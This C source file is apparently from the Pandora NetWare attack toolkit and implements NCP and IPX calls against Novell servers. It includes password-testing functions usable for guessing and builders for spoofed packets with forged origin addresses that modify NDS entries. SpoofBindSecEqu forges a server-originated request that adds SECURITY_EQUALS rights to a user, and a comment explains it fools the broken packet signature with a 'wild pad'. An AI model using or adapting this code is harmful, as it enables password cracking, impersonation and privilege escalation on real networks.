/* Pandora NCP/IPX Remote Procedure Calls library */
#include "..\pandora\pan_com.h"

/*************************** DATA STRUCTURES ********************************/

#define MAXPWLEN 64
#define MAXNAMELEN 48

/*
 * Data structure used to pass packet info when spoofing
 */
typedef struct packet_info
 {uint8 to_server[256];   /*packet to send,256=max physical lengh of packet*/
  uint8 server_mac[6];    /*server MAC addr*/
  uint8 server_network[4];/*server IPX net*/
  uint8 server_addr[6];   /*server IPX addr*/
  uint8 my_network[4];    /*spoofed addr net*/
  uint8 my_addr[6];       /*spoofed address*/
  int connection_number, task_number, sequence;
  uint8 socket_high,socket_low;
  uint8 verb[36];
  uint8 verblen;          /*lengh of verb*/
 }Packet_Info;
/****************************************************************************/

/****************************** NCP CALLS ***********************************/

/*
 * Get login key from server for challenge
 */
int getlogkey(uint8 *s)
{
  uint8 req[3];
  req[0]=0; req[1]=1; req[2]=0x17;
  return(Pan_NCP_transmit(0x17,req,3,s,8));
}

/*
 * Change the user password (old)
 */
int setpwcrypt(uint8 *oldpw, int type, char *name, uint8 *newpw, int l)
{
  uint8 req[MAXNAMELEN+31];  /* 8+16(pw's) + 1 + 3(type+len) + 3(header) */
  req[2]=0x4B;
  memcpy(req+3,oldpw,8);
  *(int *)(req+11)=type;
  req[13]=strlen(name);
  strncpy((char *)req+14,name,48);
  req[14+req[13]]=l; /* ciphered lengh of password */
  memcpy(req+15+req[13],newpw,16);
  req[0]=0;
  req[1]=29+req[13];
  return(Pan_NCP_transmit(0x17,req,req[1]+2,req,0));
}

/*
 * Bindery login using challenge key and password hash
 */
int logincrypt(uint8 *crpw, int type, char *name)
{
  uint8 req[14+MAXNAMELEN];
  req[2]=0x18;
  memcpy(req+3,crpw,8);
  *(int *)(req+11)=type;
  req[13]=strlen(name);
  strncpy((char *)req+14,name,MAXNAMELEN);
  req[0]=0;
  req[1]=12+req[13];
  return(Pan_NCP_transmit(0x17,req,req[1]+2,req,0));
}

/*
 * Get Object ID from server
 */
int getobjid(char *name, int type, long *id)
{uint8 req[MAXNAMELEN+6];
 uint8 rep[MAXNAMELEN+6];
 int err;

 req[2]=0x35;
 *(int *)(req+3)=type;
 req[5]=strlen(name);
 strncpy((char *)req+6,name,MAXNAMELEN);
 req[0]=0;
 req[1]=req[5]+4;
 err=Pan_NCP_transmit(0x17,req,req[1]+2,rep,MAXNAMELEN+6);
 *id=*(long *)rep;  /* nifty way to convert a uint8 [4] in a long */
 return(err);
}

/*
 * Test the validity of a password, transmitted cleartext
 */
int trypw(char *pw, int type, char *name)
{uint8 req[7+MAXNAMELEN+MAXPWLEN];

 req[2]=0x3f;
 *(int *)(req+3)=type;
 req[5]=strlen(name);
 strncpy((char *)req+6,name,MAXNAMELEN);
 req[6+req[5]]=strlen(pw);
 strncpy((char *)req+7+req[5],pw,MAXPWLEN);
 req[0]=0;
 req[1]=5+req[5]+req[6+req[5]];
 return(Pan_NCP_transmit(0x17,req,req[1]+2,req,0));
}

/*
 * Test the validity of a passowrd, transmited crippled
 */
int trypwcrypt(uint8 *crpw, int type, char *name)
{
  uint8 req[14+MAXNAMELEN];
  req[2]=0x4a;
  memcpy(req+3,crpw,8);
  *(int *)(req+11)=type;
  req[13]=strlen(name);
  strncpy((char *)req+14,name,MAXNAMELEN);
  req[0]=0;
  req[1]=12+req[13];
  return(Pan_NCP_transmit(0x17,req,req[1]+2,req,0));
}
/****************************************************************************/

/************************** SPOOFED IPX CALLS *******************************/

/*
 * The ResolveName call searches a Name in the NDS and expect a temporary
 * handle in return for it
 */
void ResolveName(Packet_Info *pInfo,uint8 *name, uint8 len)
{int i;

 memcpy(pInfo->to_server,pInfo->server_mac,6);
 memcpy(pInfo->to_server+6,pInfo->my_addr,6); /* 802.3 origin address */
 pInfo->to_server[12]=0; pInfo->to_server[13]=98+len*2; /* lengh */
 pInfo->to_server[14] = 0xff; pInfo->to_server[15]= 0xff; /* no checksum */
 pInfo->to_server[16]=0; pInfo->to_server[17]=98+len*2; /* NCP total lengh */
 pInfo->to_server[18] = 0x00; /* hop count (transport control) */
 pInfo->to_server[19] = 0x11; /* packet type NCP */
 memcpy(pInfo->to_server+20,pInfo->server_network,4);
 memcpy(pInfo->to_server+24,pInfo->server_addr,6);
 pInfo->to_server[30]=0x04; pInfo->to_server[31]=0x51; /* connect to NCP socket */
 memcpy(pInfo->to_server+32,pInfo->my_network,4); /* Originator address IPX */
 memcpy(pInfo->to_server+36,pInfo->my_addr,6); /* Originator address IPX */
 pInfo->to_server[42]=pInfo->socket_high; /* begin of source socket */
 pInfo->to_server[43]=pInfo->socket_low;  /* socket_low */
 pInfo->to_server[44]=0x22; pInfo->to_server[45]=0x22; /* request type : service request */
 pInfo->to_server[46]=pInfo->sequence; /*sequence number*/
 pInfo->to_server[47]=pInfo->connection_number;  /* connection no. low*/
 pInfo->to_server[48]=pInfo->task_number; /* task no. */
 pInfo->to_server[49]=0; /*conn no high*/
 pInfo->to_server[50]=104; /*func code*/
 pInfo->to_server[51]=0x02; /* NCP request : send fragmented request/reply */
 pInfo->to_server[52]=0xff; pInfo->to_server[53]=0xff; /* fragment handle */
 pInfo->to_server[54]=0xff; pInfo->to_server[55]=0xff;
 pInfo->to_server[56]=0x02; pInfo->to_server[57]=0x02; /* maximum fragment size : 514 */
 pInfo->to_server[58]=0x00; pInfo->to_server[59]=0x00;
 pInfo->to_server[60]=44+len*2+2+(44+len*2+2)%4; /* msg lengh is mult. of 4*/
 pInfo->to_server[61]=0x00; pInfo->to_server[62]=0x00; pInfo->to_server[63]=0x00;
 pInfo->to_server[64]=0x00; pInfo->to_server[65]=0x00; /* fragment flag : 00 */
 pInfo->to_server[66]=0x00; pInfo->to_server[67]=0x00;
 pInfo->to_server[68]=0x01; pInfo->to_server[69]=0x00; /* Verb number : 01=resolve name */
 pInfo->to_server[70]=0x00; pInfo->to_server[71]=0x00;
 pInfo->to_server[72]=0x00; pInfo->to_server[73]=0x10; /* reply buffer size : 4096 */
 pInfo->to_server[74]=0x00; pInfo->to_server[75]=0x00;
 pInfo->to_server[76]=0x00; pInfo->to_server[77]=0x00; pInfo->to_server[78]=0x00; /* data :  */
 pInfo->to_server[79]=0x00; pInfo->to_server[80]=0x62; pInfo->to_server[81]=0x20; /* action  */
 pInfo->to_server[82]=0x00; pInfo->to_server[83]=0x00; pInfo->to_server[84]=0x00;
 pInfo->to_server[85]=0x00; pInfo->to_server[86]=0x00; pInfo->to_server[87]=0x00;
 pInfo->to_server[88]=len*2+2; pInfo->to_server[89]=0x00; /* CN unicode size +trail 00 */
 pInfo->to_server[90]=0x00; pInfo->to_server[91]=0x00;
 for(i=0;i<len*2;i++) pInfo->to_server[92+i]=name[i];  /* CN name unicode */
}

/*
 * Modify an NDS Entry according to the Verb/Handle (data_2)/User
 */
void ModifyEntry(Packet_Info *pInfo, uint8 *name, uint8 len, uint32 data_2)
{int i;

 memcpy(pInfo->to_server,pInfo->server_mac,6);
 memcpy(pInfo->to_server+6,pInfo->my_addr,6);	/* 802.3 origin address */
 pInfo->to_server[12]=0; pInfo->to_server[13]=144-14+len*2+2; /* lengh */
 pInfo->to_server[14] = 0xff; pInfo->to_server[15]= 0xff; /* no checksum */
 pInfo->to_server[16]=0; pInfo->to_server[17]=pInfo->to_server[13]; /* NCP total lengh */
 pInfo->to_server[18] = 0x00; /* hop count (transport control) */
 pInfo->to_server[19] = 0x11; /* packet type NCP */
 memcpy(pInfo->to_server+20,pInfo->server_network,4);
 memcpy(pInfo->to_server+24,pInfo->server_addr,6);
 pInfo->to_server[30]=0x04; pInfo->to_server[31]=0x51; /* connect to NCP socket */
 memcpy(pInfo->to_server+32,pInfo->my_network,4); /* Originator address IPX */
 memcpy(pInfo->to_server+36,pInfo->my_addr,6); /* Originator address IPX */
 pInfo->to_server[42]=pInfo->socket_high; /* begin of source socket */
 pInfo->to_server[43]=pInfo->socket_low;  /* socket_low */
 pInfo->to_server[44]=0x22; pInfo->to_server[45]=0x22; /* request type */
 pInfo->to_server[46]=pInfo->sequence; /*sequence number*/
 pInfo->to_server[47]=pInfo->connection_number;  /* connection no. low*/
 pInfo->to_server[48]=pInfo->task_number; /* task no. */
 pInfo->to_server[49]=0; /*conn no high*/
 pInfo->to_server[50]=104; /*func code*/
 pInfo->to_server[51]=0x02; /* NCP request : send fragmented request/reply */
 pInfo->to_server[52]=0xff; pInfo->to_server[53]=0xff; /* fragment handle */
 pInfo->to_server[54]=0xff; pInfo->to_server[55]=0xff;
 pInfo->to_server[56]=0x02; pInfo->to_server[57]=0x02; /* maximum fragment size : 514 */
 pInfo->to_server[58]=0x00; pInfo->to_server[59]=0x00;
 pInfo->to_server[60]=80+len*2+2; pInfo->to_server[61]=0x00; /* msg lengh */
 pInfo->to_server[62]=0x00; pInfo->to_server[63]=0x00;
 pInfo->to_server[64]=0x00; pInfo->to_server[65]=0x00;  /*fragment flag*/
 pInfo->to_server[66]=0x00; pInfo->to_server[67]=0x00;
 pInfo->to_server[68]=0x09; pInfo->to_server[69]=0x00;  /* Verb number : Modify Entry */
 pInfo->to_server[70]=0x00; pInfo->to_server[71]=0x00;
 pInfo->to_server[72]=0x00; pInfo->to_server[73]=0x00;  /* reply buffer size 0 */
 pInfo->to_server[74]=0x00; pInfo->to_server[75]=0x00;
 pInfo->to_server[76]=0x00; pInfo->to_server[77]=0x00;  /* data_0 ??*/
 pInfo->to_server[78]=0x00; pInfo->to_server[79]=0x00;
 pInfo->to_server[80]=0x00; pInfo->to_server[81]=0x00;  /* data_1 ?? */
 pInfo->to_server[82]=0x00; pInfo->to_server[83]=0x00;
 *(uint32 *)((*pInfo).to_server+84)=data_2;
  /* data_2 is a 32bits hex, it spreads from [84]->[87] */
  /* data_2 is passed in reverse order due to Intel byte ordering */
 pInfo->to_server[88]=0x01; pInfo->to_server[89]=0x00;  /* data_3 ?? */
 pInfo->to_server[90]=0x00; pInfo->to_server[91]=0x00;
 pInfo->to_server[92]=0x05; pInfo->to_server[93]=0x00;  /* data_4 ?? */
 pInfo->to_server[94]=0x00; pInfo->to_server[95]=0x00;
 pInfo->to_server[96]=pInfo->verblen*2+2; pInfo->to_server[97]=0x00; /* verb lengh + trail '00' */
 pInfo->to_server[98]=0x00; pInfo->to_server[99]=0x00;
 for(i=0;i<36;i++) pInfo->to_server[100+i]=pInfo->verb[i];  /* verb unicode */
 pInfo->to_server[136]=0x01; pInfo->to_server[137]=0x00; /*Action : 0x01 add, 0x07 remove*/
 pInfo->to_server[138]=0x00; pInfo->to_server[139]=0x00;
 pInfo->to_server[140]=len*2+2; pInfo->to_server[141]=0x00; /* membername lengh */
 pInfo->to_server[142]=0x00; pInfo->to_server[143]=0x00;
 for(i=0;i<len*2+2;i++) pInfo->to_server[144+i]=name[i];/*memb. unicode*/
}

/*
 * Modify an NDS Entry according to the ObjectID (data_2)/User
 */
void NDSModifyEntry(Packet_Info *pInfo, uint8 *name, uint8 len, uint32 data_2)
{int i;

 memcpy(pInfo->to_server,pInfo->server_mac,6);
 memcpy(pInfo->to_server+6,pInfo->my_addr,6);	/* 802.3 origin address */
 pInfo->to_server[12]=1; pInfo->to_server[13]=144-14+len*2+2; /* lengh */
 pInfo->to_server[14] = 0xff; pInfo->to_server[15]= 0xff; /* no checksum */
 pInfo->to_server[16]=0; pInfo->to_server[17]=pInfo->to_server[13]-1; /* NCP total lengh */
 pInfo->to_server[18] = 0x00; /* hop count (transport control) */
 pInfo->to_server[19] = 0x17; /*** packet type NDS ***/
 memcpy(pInfo->to_server+20,pInfo->server_network,4);
 memcpy(pInfo->to_server+24,pInfo->server_addr,6);
 pInfo->to_server[30]=0x04; pInfo->to_server[31]=0x51; /* connect to NCP socket */
 memcpy(pInfo->to_server+32,pInfo->my_network,4); /* Originator address IPX */
 memcpy(pInfo->to_server+36,pInfo->my_addr,6); /* Originator address IPX */
 pInfo->to_server[42]=pInfo->socket_high; /* begin of source socket */
 pInfo->to_server[43]=pInfo->socket_low;  /* socket_low */
 pInfo->to_server[44]=0x22; pInfo->to_server[45]=0x22; /* request type */
 pInfo->to_server[46]=pInfo->sequence; /*sequence number*/
 pInfo->to_server[47]=pInfo->connection_number;  /* connection no. low*/
 pInfo->to_server[48]=pInfo->task_number; /* task no. */
 pInfo->to_server[49]=0; /*conn no high*/
 pInfo->to_server[50]=104; /*func code*/
 pInfo->to_server[51]=0x02; /* NCP request : send fragmented request/reply */
 pInfo->to_server[52]=0xff; pInfo->to_server[53]=0xff; /* fragment handle */
 pInfo->to_server[54]=0xff; pInfo->to_server[55]=0xff;
 pInfo->to_server[56]=0x02; pInfo->to_server[57]=0x02; /* maximum fragment size : 514 */
 pInfo->to_server[58]=0x00; pInfo->to_server[59]=0x00;
 pInfo->to_server[60]=80+len*2+2; pInfo->to_server[61]=0x00; /* msg lengh */
 pInfo->to_server[62]=0x00; pInfo->to_server[63]=0x00;
 pInfo->to_server[64]=0x00; pInfo->to_server[65]=0x00;  /*fragment flag*/
 pInfo->to_server[66]=0x00; pInfo->to_server[67]=0x00;
 pInfo->to_server[68]=0x09; pInfo->to_server[69]=0x00;  /* Verb number : Modify Entry */
 pInfo->to_server[70]=0x00; pInfo->to_server[71]=0x00;
 pInfo->to_server[72]=0x00; pInfo->to_server[73]=0x00;  /* reply buffer size 0 */
 pInfo->to_server[74]=0x00; pInfo->to_server[75]=0x00;
 pInfo->to_server[76]=0x00; pInfo->to_server[77]=0x00;  /* data_0 ??*/
 pInfo->to_server[78]=0x00; pInfo->to_server[79]=0x00;
 pInfo->to_server[80]=0x00; pInfo->to_server[81]=0x00;  /* data_1 ?? */
 pInfo->to_server[82]=0x00; pInfo->to_server[83]=0x00;
 *(uint32 *)((*pInfo).to_server+84)=data_2;
  /* data_2 is a 32bits hex, it spreads from [84]->[87] */
  /* data_2 is passed in reverse order due to Intel byte ordering */
 pInfo->to_server[88]=0x01; pInfo->to_server[89]=0x00;  /* data_3 ?? */
 pInfo->to_server[90]=0x00; pInfo->to_server[91]=0x00;
 pInfo->to_server[92]=0x05; pInfo->to_server[93]=0x00;  /* data_4 ?? */
 pInfo->to_server[94]=0x00; pInfo->to_server[95]=0x00;
 pInfo->to_server[96]=pInfo->verblen*2+2; pInfo->to_server[97]=0x00; /* verb lengh + trail '00' */
 pInfo->to_server[98]=0x00; pInfo->to_server[99]=0x00;
 for(i=0;i<36;i++) pInfo->to_server[100+i]=pInfo->verb[i];  /* verb unicode */
 pInfo->to_server[136]=0x01; pInfo->to_server[137]=0x00; /*Action : 0x01 add, 0x07 remove*/
 pInfo->to_server[138]=0x00; pInfo->to_server[139]=0x00;
 pInfo->to_server[140]=len*2+2; pInfo->to_server[141]=0x00; /* membername lengh */
 pInfo->to_server[142]=0x00; pInfo->to_server[143]=0x00;
 for(i=0;i<len*2+2;i++) pInfo->to_server[144+i]=name[i];/*memb. unicode*/
}

void SpoofBindSecEqu(Packet_Info *pInfo,uint8 *username, uint8 objlen,
                                        uint8 *membername, uint8 memlen)
{int i;

 memcpy(pInfo->to_server,pInfo->server_mac,6);    /* Dest MAC */
 memcpy(pInfo->to_server+6,pInfo->server_addr,6); /* 802.3 origin address */
 pInfo->to_server[12]=0; pInfo->to_server[13]=62+objlen+memlen; /* lengh */
 pInfo->to_server[14] = 0xff; pInfo->to_server[15]= 0xff; /* no checksum */
 pInfo->to_server[16]=0; pInfo->to_server[17]=62+objlen+memlen; /* NCP total lengh */
 pInfo->to_server[18] = 0x00; /* hop count (transport control) : no router */
 pInfo->to_server[19] = 0x11; /* packet type NCP */
 memcpy(pInfo->to_server+20,pInfo->server_network,4); /* Destination */
 memcpy(pInfo->to_server+24,pInfo->server_addr,6);
 pInfo->to_server[30]=0x04; pInfo->to_server[31]=0x51; /* connect to NCP socket */
 memcpy(pInfo->to_server+32,pInfo->server_network,4); /* Originator */
 memcpy(pInfo->to_server+36,pInfo->server_addr,6);
 pInfo->to_server[42]=pInfo->socket_high; /* begin of source socket */
 pInfo->to_server[43]=pInfo->socket_low;  /* socket_low */
 pInfo->to_server[44]=0x22; pInfo->to_server[45]=0x22; /* request type */
 pInfo->to_server[46]=pInfo->sequence; /*sequence number*/
 pInfo->to_server[47]=pInfo->connection_number;  /* connection no. low*/
 pInfo->to_server[48]=pInfo->task_number; /* task no. */
 pInfo->to_server[49]=0;  /*conn no high*/
 pInfo->to_server[50]=23; /*func code*/
 pInfo->to_server[51]=0x00; pInfo->to_server[52]=23+objlen+memlen; /*subfunc len */
 pInfo->to_server[53]=65; /*subfunc code */
 pInfo->to_server[54]=0x00; pInfo->to_server[55]=0x01; /* object type : user */
 pInfo->to_server[56]=objlen;	                             /* object len */
 memcpy(pInfo->to_server+57,username,objlen);                /* object name */
 pInfo->to_server[57+objlen]=15;                             /* property len */
 memcpy(pInfo->to_server+58+objlen,"SECURITY_EQUALS",15);    /* property name */
 pInfo->to_server[73+objlen]=0; pInfo->to_server[74+objlen]=1;/* member type */
 pInfo->to_server[75+objlen]=memlen;                         /* member length */
 memcpy(pInfo->to_server+76+objlen,membername,memlen);	     /* member name */
 /* 'internal' connections uses a borken signature that can be fooled
     with a 'wild pad' */
 for(i=0;i<8;i++) pInfo->to_server[76+objlen+memlen+i]=0xff; /* wild pad */
}

/****************************************************************************/

